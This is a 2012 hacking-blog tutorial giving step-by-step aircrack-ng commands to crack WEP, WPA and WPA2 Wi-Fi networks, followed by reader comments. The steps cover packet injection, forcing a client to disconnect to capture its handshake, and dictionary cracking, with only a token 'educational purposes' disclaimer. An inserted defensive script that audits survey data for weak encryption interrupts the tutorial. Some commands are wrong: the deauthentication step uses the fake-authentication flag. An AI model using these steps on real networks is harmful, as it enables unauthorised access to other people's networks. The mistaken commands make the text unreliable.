Cracking WEP, WPA and WPA2 Encrypted Wifi Networks using Aircrack-ng.

Posted: 03/04/2012 in G.N.A.HackTeam, Hacking, Linux Hacking, Mac Hacking, Windows Hacking

Tutorial by Akatzbreaker

In this tutorial I will demonstrate how to crack almost any encrypted network that uses WEP, WPA or WPA2.

1. Before we start.

Take into account the Disclaimer at this page: More from the G.N.A. Hack Team

What we need:

Mac and Windows:

I would recommend installing BackTrack or Ubuntu in a VMware virtual machine.


sudo apt-get install aircrack-ng kismet

(airmon-ng, airodump-ng and aireplay-ng are installed as part of the aircrack-ng package.)

(Recommended Download for Linux Users – It auto configures the tools needed)


NOTHING! Everything is included by default.

NOTE: The pictures included in the tutorial are NOT mine….


2. WEP Cracking.

WEP is very easy and fast to crack. Here are the steps:

1. Put your Wireless Interface into Monitor Mode:

airmon-ng start wlan0

(In this example our interface is ‘wlan0’ – To find out your wireless interface, type: iwconfig or airmon-ng)

2. Get Info from the Available Networks:

airodump-ng mon0

(mon0 is the monitored wlan0 interface)

3. Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:

airodump-ng -c channel -w filetosave --bssid macaddrs mon0

(‘channel’ is the Channel Number) (‘filetosave’ is the file where airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the Network) All this info is provided by the command used in Step 2.

4. To speed up the procedure, type in a new terminal:

aireplay-ng -1 0 -a bssid mon0

(‘bssid’ is the MAC Address of the Network)

5. When this command is done, capture packets by typing:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0

(‘bssid’ is the Network’s MAC Address)

6. When the above command has collected about 20.000 – 30.000 packets, you can crack the network by typing:

aircrack-ng filename.cap

(Instead of ‘filename.cap’, enter the file that aireplay-ng saved in your current directory. This file is named wep-x.cap, where x is a number starting from ‘01’, then ‘02’, etc.) (Instead of ‘wep-01.cap’ you can use ‘wep*.cap’, as in the example, to ‘Auto-Select’ the file)

7. When aircrack-ng finds the key it will display something like:

KEY FOUND! [ 12:34:56:78:90 ]

(In this example our key is ‘1234567890’)

8. When Finished, make sure you put your wireless interface back to original Mode by typing:

airmon-ng stop wlan0
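
The defensive counterpart to steps 2 and 3, as an added example that is not part of the original tutorial: a shell function that reads the CSV file airodump-ng writes next to the capture when -w is used and lists access points still advertising WEP, no encryption, or TKIP, so they can be moved to WPA2 with CCMP. The function names, the BSSIDs and the sample survey are constructed; the column layout is assumed to be the standard airodump-ng one.

```shell
#!/bin/sh
# Added example (not from the tutorial): flag weakly protected access points
# in an airodump-ng CSV. Function names and the sample data are constructed.

# Constructed survey in the airodump-ng CSV layout (AP table, then stations).
sample_csv() {
cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2012-04-03 10:00:00, 2012-04-03 10:05:00,  6,  54, WEP , WEP,    , -40,  120, 2500,   0.  0.  0.  0,  10, SKIDHACKER, 
00:11:22:33:44:66, 2012-04-03 10:00:01, 2012-04-03 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,   98,    0,   0.  0.  0.  0,   9, Office-5G, 
00:11:22:33:44:77, 2012-04-03 10:00:02, 2012-04-03 10:05:00,  1,  54, WPA , TKIP, PSK, -60,   75,    0,   0.  0.  0.  0,  12, Guest, Lobby, 
00:11:22:33:44:88, 2012-04-03 10:00:03, 2012-04-03 10:05:00,  1,  54, OPN ,     ,    , -70,   40,    0,   0.  0.  0.  0,   7, Printer, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2012-04-03 10:01:00, 2012-04-03 10:04:00, -50, 30, 00:11:22:33:44:55, SKIDHACKER
EOF
}

# audit_airodump_csv FILE "BSSID BSSID ..."
# Prints REASON|BSSID|ESSID for each weak AP. The second argument is the list
# of BSSIDs you administer; pass "" to report every AP in the survey.
audit_airodump_csv() {
    awk -F',' -v own="$2" '
    function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
    BEGIN { n = split(toupper(own), a, " "); for (i = 1; i <= n; i++) mine[a[i]] = 1 }
    trim($1) == "BSSID"       { in_ap = 1; next }   # start of the AP table
    trim($1) == "Station MAC" { in_ap = 0; next }   # client table: not audited
    !in_ap || NF < 15         { next }              # blank or truncated rows
    {
        bssid = toupper(trim($1)); priv = trim($6); cipher = trim($7)
        if (n > 0 && !(bssid in mine)) next
        # The ESSID is unquoted and may contain commas: it runs from field 14
        # up to the field before the trailing Key column.
        essid = $14; for (i = 15; i < NF; i++) essid = essid "," $i
        essid = trim(essid)
        if (priv ~ /WEP/)         why = "WEP"
        else if (priv ~ /OPN/)    why = "OPEN"
        else if (cipher ~ /TKIP/) why = "TKIP"
        else next                                   # WPA2 with CCMP only: fine
        printf "%s|%s|%s\n", why, bssid, essid
    }' "$1"
}

# Demo on the constructed survey: report every weak AP it contains.
tmp=$(mktemp) && sample_csv > "$tmp" && audit_airodump_csv "$tmp" "" && rm -f "$tmp"
```

Run it against the CSV from a survey of your own site and pass your own BSSIDs as the second argument, so neighbouring networks are left out of the report.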


3. WPA – WPA2 Cracking

How it is Cracked:

WPA and WPA2 are a special case when it comes to Wireless Network Cracking. The method used to crack them is named ‘Handshake’. To get the Handshake, we fool a Computer connected to the network we will crack. Then we use a dictionary to crack the Handshake and get the Key. So, to crack these networks we need:

  • A huge dictionary / wordlist – The bigger, the better. (You can find one by searching the web using terms like: ‘Large WPA-WPA2 Cracking Wordlist’)
  • A PC already connected to that network.

So, let’s go and crack that network:

1. Enter your wireless interface into monitor mode:

airmon-ng start wlan0

(List your interfaces by typing airmon-ng or iwlist scan)

2. Get the list of the networks available:

airodump-ng mon0

(‘mon0’ is the monitored interface)

3. Get info on a specific Network:

airodump-ng -c channel -w filename --bssid macaddrs mon0

(‘channel’ is the Network’s channel number) (‘filename’ is the name of the file that airodump-ng will save its data) (‘macaddrs’ is the Network’s MAC Address)

4. Note that under the STATION Tab there is a MAC address. This means that there is someone connected to that network and this is his PC’s MAC address. To get the handshake we will kick him off and he will automatically reconnect to the network.

So, to kick him off and get the handshake, type in a new terminal:

aireplay-ng -1 0 -a bssid mon0

(in place of ‘bssid’, type the Network’s MAC Address)

5. When we successfully get the handshake, stop the process by hitting CTRL+C in the terminal where Airodump-ng is running. The handshake should be placed in your Home Folder.

To crack it type:

aircrack-ng -w dictionary /username/filename

(‘dictionary’ is the name/path of your dictionary) (‘username’ is your username – on Backtrack is ‘root’ by default) (‘filename’ is the captured WPA/WPA2 Handshake)



This was the end of this great tutorial. I note, once more, that you should read the disclaimer here and that all these hacking tutorials I make are only for educational purposes and to make you understand how hacking works.

More tutorials coming……



  3. nvmminh says:

    Thank you very much! I have learned so much :)

  4. Azeddine says:

    Thank you so much for getting involved, for your efforts and for sharing your knowledge with us!


  10. mandi says:

    I didn’t understand, how can we do that in Windows 7?

  11. Tony says:

    Akatzbreaker, one question: what if there is no one connected to that network so he doesn’t automatically reconnect. Can we go on with the cracking?

  12. Intrahack says:

    I only have NICs, no external network adapters. When I use “ifconfig”, I only end up with eth0 and lo. The mon0 interface never appears. How can I attach a NIC to the VM?


  15. michal mataj says:

    Hi, can anyone help me: how can I get root privileges and how can I run programs as root in Linux OS? Thank you.
    Sorry for bad English, I am Czech.

  16. Phans says:

    Possibly a stupid question…
    Does this work on iOS?
